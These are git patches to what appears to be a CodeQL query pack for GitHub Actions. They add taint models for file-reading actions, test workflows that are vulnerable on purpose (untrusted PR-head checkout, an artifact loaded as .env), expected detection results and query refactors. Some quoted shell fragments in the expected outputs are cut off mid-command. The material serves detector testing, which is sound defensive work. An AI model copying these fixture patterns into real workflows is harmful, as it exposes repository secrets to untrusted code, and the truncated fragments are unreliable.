ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | @@ -1100,23 +1106,30 @@ summaries | aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | | aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | | aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | +| bfren/read-file | * | artifact | output.contents | taint | manual | | bobheadxi/deployments | * | input.env | output.env | taint | manual | +| browniebroke/read-nvmrc-action | * | artifact | output.node_version | taint | manual | | bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | | bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| c-py/action-dotenv-to-setenv | * | artifact | output.* | taint | manual | | cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| christian-draeger/read-properties | * | artifact | output.* | taint | manual | | cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | | coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | | crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | | csexton/release-asset-action | * | input.release-url | output.url | taint | manual | +| dangdennis/toml-action | * | artifact | output.value | taint | manual | | delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | | drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | | drawpile/drawpile | * | input.path | output.path | taint | manual | +| duskmoon314/action-load-env | * | artifact | output.* | taint | manual | | element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | | envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | | envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | | flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | | frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | | frabert/replace-string-action | * | input.string | output.replaced | taint | manual | +| gagle/package-version | * | artifact | output.version | taint | manual | | game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | | getsentry/action-release | * | input.version | output.version | taint | manual | | getsentry/action-release | * | input.version_prefix | output.version | taint | manual | @@ -1124,6 +1137,7 @@ summaries | gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | | gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | | gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| guibranco/github-file-reader-action-v2 | * | artifact | output.contents | taint | manual | | hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | | hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | | hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | @@ -1137,31 +1151,47 @@ summaries | hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | | hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | | hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | +| igorskyflyer/action-readfile | * | artifact | output.content | taint | manual | +| jaywcjlove/github-action-read-file | * | artifact | output.content | taint | manual | +| jbutcher5/read-yaml | * | artifact | output.data | taint | manual | | jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | | jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | | jsdaniell/create-json | * | input.json | output.successfully | taint | manual | | jsdaniell/create-json | * | input.name | output.successfully | taint | manual | +| juliangruber/read-file-action | * | artifact | output.content | taint | manual | | jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| komorebitech/read-files-action | * | artifact | output.content | taint | manual | | kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | +| kurt-code/gha-properties | * | artifact | output.* | taint | manual | | larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | | linkerd/linkerd2 | * | input.component | output.image | taint | manual | | linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | | linkerd/linkerd2 | * | input.tag | output.image | taint | manual | | mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | | mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | +| madhead/read-java-properties | * | artifact | output.* | taint | manual | | mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | | mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | | metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | +| mindsers/changelog-reader-action | * | artifact | output.* | taint | manual | +| miraai/read-helm-chart-yaml | * | artifact | output.* | taint | manual | | mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | | mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | | neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | | neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | +| nichmor/minimal-read-yaml | * | artifact | output.* | taint | manual | | novuhq/novu | * | input.docker_name | output.image | taint | manual | | philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | +| pietrobolcato/action-read-yaml | * | artifact | output.* | taint | manual | +| rexdefuror/read-package-json | * | artifact | env.* | taint | manual | +| romanlamsal/dotenv-concat | * | artifact | output.* | taint | manual | | ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | | salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | +| sammcj/dotenv-output-action | * | artifact | output.* | taint | manual | +| satya-500/read-file-github-action | * | artifact | output.contents | taint | manual | | shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | | shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| simonblund/version-reader | * | artifact | output.version | taint | manual | | streetsidesoftware/cspell | * | input.value | output.value | taint | manual | | streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | | suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | @@ -1169,6 +1199,7 @@ summaries | tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | | timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | | timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +| traversals-analytics-and-intelligence/file-reader-action | * | artifact | output.content | taint | manual | | zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | calls | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | actions/github-script | diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml new file mode 100644 index 000000000000..c33c90dbb9c6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml @@ -0,0 +1,25 @@ +# Second Workflow +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + - name: Load .env file + uses: aarcangeli/load-dotenv@v1.0.0 + with: + path: 'backend/new' + filenames: | + .env + .env.test + quiet: false + if-file-not-found: error + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 9c2fd6faf465..02aed1c05cbb 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -14,6 +14,7 @@ edges | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -45,6 +46,8 @@ nodes | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -62,3 +65,4 @@ subpaths | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 7ea9865c70a9..b3da13beda38 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -14,6 +14,7 @@ edges | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -45,5 +46,7 @@ nodes | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 2e0f79da4a00..5623964e5498 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -6,6 +6,9 @@ edges | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | provenance | | | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | +| .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | semmle.label | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | semmle.label | steps.prepare.outputs.pr | | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning4.yml:17:9:21:6 | Run Step: artifact [id] | semmle.label | Run Step: artifact [id] | | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | +| .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | semmle.label | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | semmle.label | steps.prepare.outputs.pr | | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning4.yml:17:9:21:6 | Run Step: artifact [id] | semmle.label | Run Step: artifact [id] | | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$( Date: Fri, 12 Jul 2024 12:46:03 +0200 Subject: [PATCH 411/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e5e89afc471e..4b237b4bfd3c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.18 +version: 0.1.19 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index db9bdecf8b87..4d522db3f98a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.18 +version: 0.1.19 groups: [actions, queries] suites: codeql-suites extractor: javascript From 7f77e89bbfa492e800e973152c0fbe2b4ece9240 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 23:31:12 +0200 Subject: [PATCH 412/707] feat(tests): Add test for checkout in composite action --- .../actions/dangerous-git-checkout/action.yml | 13 +++++++++++++ .../.github/workflows/untrusted_checkout3.yml | 13 +++++++++++++ .../CWE-829/UntrustedCheckoutCritical.expected | 8 ++++++++ 3 files changed, 34 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml b/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml new file mode 100644 index 000000000000..57058e7a076f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml @@ -0,0 +1,13 @@ +name: Dangerous git Checkout +description: "Git Checkout from PR code so we can run checks from forks" +runs: + using: "composite" + steps: + - name: Checkout repo + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + fetch-depth: 2 + - run: echo "foo" + shell: bash + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml new file mode 100644 index 000000000000..e0d32875ee70 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml @@ -0,0 +1,13 @@ +name: Test +on: + workflow_call: + workflow_run: + workflows: [Trigger] + types: [completed] +jobs: + test: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: ./.github/actions/dangerous-git-checkout + - run: yarn test diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 4431d865417d..ce6d75bf1132 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,4 +1,7 @@ edges +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | @@ -332,6 +335,11 @@ edges | .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | | .github/workflows/untrusted_checkout2.yml:7:9:14:6 | Run Step: pr_number | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | From 69d173f13c2463c60e04e1aa535dacfd658daaf4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 23:47:52 +0200 Subject: [PATCH 413/707] fix(refactor): Remove unnecessary variables --- ql/src/Security/CWE-285/ImproperAccessControl.ql | 1 - ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 1 - ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 1 - ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql | 4 +--- ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql | 4 +--- ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql | 4 +--- 6 files changed, 3 insertions(+), 12 deletions(-) diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql index cd7cefe2dd31..3fc94d1aa22d 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.ql +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -16,7 +16,6 @@ import codeql.actions.security.ControlChecks from LocalJob job, LabelCheck check, MutableRefCheckoutStep checkout, Event event where - job = checkout.getEnclosingJob() and job.isPrivileged() and job.getATriggerEvent() = event and event.getName() = "pull_request_target" and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index bbbab7bcab70..2656b22e1e31 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -20,7 +20,6 @@ query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck check where - j = checkout.getEnclosingJob() and j.getAStep() = checkout and // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() = s and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index b9b3154debfc..0a83cc54ad69 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -18,7 +18,6 @@ import codeql.actions.security.ControlChecks from LocalJob j, MutableRefCheckoutStep checkout, ControlCheck check where - j = checkout.getEnclosingJob() and j.getAStep() = checkout and // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index a0da81bde22a..02054ebbf0ab 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -20,10 +20,8 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } -from LocalJob j, PRHeadCheckoutStep checkout, PoisonableStep s +from PRHeadCheckoutStep checkout, PoisonableStep s where - j = checkout.getEnclosingJob() and - j.getAStep() = checkout and // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = s and // the checkout occurs in a privileged context diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index dba0dadb61bf..0675603af0f9 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -18,10 +18,8 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from LocalJob j, PRHeadCheckoutStep checkout +from PRHeadCheckoutStep checkout where - j = checkout.getEnclosingJob() and - j.getAStep() = checkout and // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index ca91fcb9048a..8cc8e75c2af3 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -18,10 +18,8 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from LocalJob j, PRHeadCheckoutStep checkout +from PRHeadCheckoutStep checkout where - j = checkout.getEnclosingJob() and - j.getAStep() = checkout and // the checkout occurs in a non-privileged context inNonPrivilegedContext(checkout) select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." From 9917c46f6ffb2cd0f5e2b6fab9528090fdbdbe09 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 23:48:52 +0200 Subject: [PATCH 414/707] feat(core): Add StepsContainer class A StepsContainer is an abstract class that includes all nodes with steps: Runs and LocalJobs --- ql/lib/codeql/actions/Ast.qll | 34 +++--- ql/lib/codeql/actions/ast/internal/Ast.qll | 133 ++++++++++++++------- 2 files changed, 109 insertions(+), 58 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 0662f100fe42..5c6cdc141eed 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -74,25 +74,15 @@ class CompositeAction extends AstNode instanceof CompositeActionImpl { Input getInput(string inputName) { result = super.getInput(inputName) } - LocalJob getACaller() { result = super.getACaller() } + LocalJob getACallerJob() { result = super.getACallerJob() } + + UsesStep getACallerStep() { result = super.getACallerStep() } predicate isPrivileged() { super.isPrivileged() } predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } -/** - * An `runs` mapping in a custom composite action YAML. - * See 